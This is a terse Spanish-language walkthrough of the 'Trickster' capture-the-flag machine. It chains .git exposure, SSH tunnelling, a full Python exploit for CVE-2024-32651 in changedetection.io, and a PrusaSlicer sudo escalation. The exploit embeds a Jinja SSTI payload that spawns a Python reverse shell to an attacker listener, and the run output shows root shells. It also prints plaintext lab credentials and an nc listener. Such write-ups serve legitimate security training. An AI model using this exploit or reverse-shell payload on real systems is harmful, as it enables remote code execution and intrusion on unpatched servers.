Trickster .git
┌──(docker㉿docker)-[~/HackBox]
└─$ nmap -Pn -p- --min-rate 5000 -sC -sV -oN nmap-trickster.txt 10.10.11.34


Entramos donde dice SHOP:

Búsqueda de directorios:
┌──(docker㉿docker)-[~/HackBox]
└─$ ffuf -u http://shop.trickster.htb/FUZZ -w /opt/SecLists/Discovery/Web-Content/common.txt -mc 200 -t 50 -v -fc 404


Explotar los .git con:
┌──(docker㉿docker)-[~/HackBox/GitHack]
└─$ python3 GitHack.py http://shop.trickster.htb/.git/
[+] Download and parse index file ...
[+] .php-cs-fixer.dist.php
┌──(docker㉿docker)-[~/HackBox/GitHack/shop.trickster.htb]
└─$ ls -la
total 228
drwxrwxr-x 3 docker docker 4096 Dec 26 23:42 .
drwxrwxr-x 5 docker docker 4096 Dec 26 23:41 ..
-rw-rw-r-- 1 docker docker 1538 Dec 26 23:41 .php-cs-fixer.dist.php
-rw-rw-r-- 1 docker docker 5054 Dec 26 23:41 INSTALL.txt
-rw-rw-r-- 1 docker docker 522 Dec 26 23:41 Install_PrestaShop.html
-rw-rw-r-- 1 docker docker 183862 Dec 26 23:41 LICENSES
-rw-rw-r-- 1 docker docker 863 Dec 26 23:41 Makefile
drwxrwxr-x 8 docker docker 4096 Dec 26 23:41 admin634ewutrx1jgitlooaj
-rw-rw-r-- 1 docker docker 1305 Dec 26 23:42 autoload.php
-rw-rw-r-- 1 docker docker 2506 Dec 26 23:42 error500.html
-rw-rw-r-- 1 docker docker 1169 Dec 26 23:42 index.php
-rw-rw-r-- 1 docker docker 1256 Dec 26 23:42 init.php
Entramos al directorio admin634ewutrx1jgitlooaj
por la pagina web:

.git
Busqué uno en el directorio anterior admin_pannel
y parece que hay un usuario Adam en él.

alwaysandforever
ssh -L 8000:172.17.0.2:5000 james@10.10.11.34

El script:
┌──(docker㉿docker)-[~/HackBox]
└─$ cat changedetection3.py
# Exploit Title: changedetection <= 0.45.20 Remote Code Execution (RCE)
# Date: 5-26-2024
# Exploit Author: Zach Crosman (zcrosman)
# Vendor Homepage: changedetection.io
# Software Link: https://github.com/dgtlmoon/changedetection.io
# Version: <= 0.45.20
# Tested on: Linux
# CVE : CVE-2024-32651
# Modified by: Evgeni Semenov (htb: nilz)
from pwn import *
import requests
from bs4 import BeautifulSoup
import argparse
def start_listener(port):
listener = listen(port)
print(f"Listening on port {port}...")
conn = listener.wait_for_connection()
print("Connection received!")
context.newline = b'\r\n'
# Switch to interactive mode
conn.interactive()
def add_detection(url, listen_ip, listen_port, notification_url, password=''):
session = requests.Session()
# Revshell payload
payload = f"""
{{% for x in ().__class__.__base__.__subclasses__() %}}
{{% if "warning" in x.__name__ %}}
{{{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\\"{listen_ip}\\",{listen_port}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\\"/bin/bash\\")'").read()}}}}
{{% endif %}}
{{% endfor %}}
"""
# First request to get CSRF token
request1_headers = {
"Cache-Control": "max-age=0",
"Upgrade-Insecure-Requests": "1",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close"
}
response = session.get(url, headers=request1_headers)
soup = BeautifulSoup(response.text, 'html.parser')
csrf_token = soup.find('input', {'name': 'csrf_token'})['value']
print(f'Obtained CSRF token: {csrf_token}')
if args.password:
# Logging in
print('Logging in...')
data = {
'csrf_token': csrf_token,
'password': password,
'email': 'defaultuser@changedetection.io'
}
response = session.post(url+"/login", data=data)
if response.status_code == 200:
print('[+] Login succesful')
else:
print('[-] Login failed:', response.status_code)
# Second request to submit the form and get the redirect URL
add_url = f"{url}/form/add/quickwatch"
add_url_headers = { # Define add_url_headers here
"Origin": url,
"Content-Type": "application/x-www-form-urlencoded"
}
add_url_data = {
"csrf_token": csrf_token,
"url": "http://callback.com:8888",
"tags": '',
"edit_and_watch_submit_button": "Edit > Watch",
"processor": "text_json_diff"
}
post_response = session.post(add_url, headers=add_url_headers, data=add_url_data, allow_redirects=False)
# Extract the URL from the Location header
if 'Location' in post_response.headers:
redirect_url = post_response.headers['Location']
print(f'Redirect URL: {redirect_url}')
else:
print('No redirect URL found')
return
# Third request to add the changedetection url with ssti in notification config
save_detection_url = f"{url}{redirect_url}"
save_detection_headers = { # Define save_detection_headers here
"Referer": redirect_url,
"Cookie": f"session={session.cookies.get('session')}"
}
save_detection_data = {
"csrf_token": csrf_token,
"url": "http://callback.com:8888",
"title": '',
"tags": '',
"time_between_check-weeks": '',
"time_between_check-days": '',
"time_between_check-hours": '',
"time_between_check-minutes": '',
"time_between_check-seconds": '30',
"filter_failure_notification_send": 'y',
"fetch_backend": 'system',
"webdriver_delay": '',
"webdriver_js_execute_code": '',
"method": 'GET',
"headers": '',
"body": '',
"notification_urls": notification_url,
"notification_title": '',
"notification_body": payload,
"notification_format": 'System default',
"include_filters": '',
"subtractive_selectors": '',
"filter_text_added": 'y',
"filter_text_replaced": 'y',
"filter_text_removed": 'y',
"trigger_text": '',
"ignore_text": '',
"text_should_not_be_present": '',
"extract_text": '',
"save_button": 'Save'
}
final_response = session.post(save_detection_url, headers=save_detection_headers, data=save_detection_data)
print('Final request made.')
print('Spawning shell...')
shell_data = {
"csrf_token": csrf_token,
"notification_body": payload,
"notification_format": 'System default',
"notification_urls": notification_url,
"window_url": url + redirect_url.split('?')[0]
}
shell_url = redirect_url.split('?')[0].replace('/edit/','/notification/send-test/')
shell_response = session.post(f"{url}{shell_url}", data=shell_data)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Add detection and start listener')
parser.add_argument('--url', type=str, required=True, help='Base URL of the target site')
parser.add_argument('--port', type=int, help='Port for the listener', default=4444)
parser.add_argument('--ip', type=str, required=True, help='IP address for the listener')
parser.add_argument('--notification', type=str, help='Notification url is most likely required..', default = "mailto://foo@bar.com")
parser.add_argument('--password', type=str, help='Admin panel password')
args = parser.parse_args()
add_detection(args.url, args.ip, args.port, args.notification, args.password)
start_listener(args.port)
┌──(docker㉿docker)-[~/HackBox]
└─$ python3 changedetection3.py --url http://localhost:8000/ --ip 10.10.16.4 --port 9001 --password alwaysandforever
Ingresamos ahora tenemos que escalar privilegios:
Obtained CSRF token: IjZjMjZjMzVkZjExY2QyOWJkMDRkY2ZmNzUxYWYwZmI5NzA4OGJlMjUi.Z28_kg.JFb5Zv5gcBpuIdidkzFlBljfkE4
Logging in...
[+] Login succesful
Redirect URL: /edit/c8b8cc30-b03a-4a3c-b001-31b6e8f928d1?unpause_on_save=1
Final request made.
Spawning shell...
[+] Trying to bind to :: on port 9001: Done
[+] Waiting for connections on :::9001: Got connection from ::ffff:10.10.11.34 on port 58920
Listening on port 9001...
Connection received!
[*] Switching to interactive mode
root@a4b9a36ae7ff:/app# $
┌──(docker㉿docker)-[~/HackBox]
└─$ ssh adam@trickster.htb
Credenciales:
Username : adam Password : adam_admin992

Como explotar esa bulnerabilidad descargamos en nuestra maquina atacante:
Despues de cambiar la ip y puerto lo llevamos a la maquina comprometida:
┌──(docker㉿docker)-[~/HackBox]
└─$ scp -r prusaslicer_exploit adam@10.10.11.34:/tmp/
Una vez que la rengamos en la máquina comprometida intentaremos ejecutarlo con el siguiente comando:
sudo /opt/PrusaSlicer/prusaslicer -s evil.3mf
En escucha:
┌──(docker㉿docker)-[~/HackBox/prusaslicer_exploit]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.11.34] 42622
root@trickster:/tmp/prusaslicer_exploit# ls
Last updated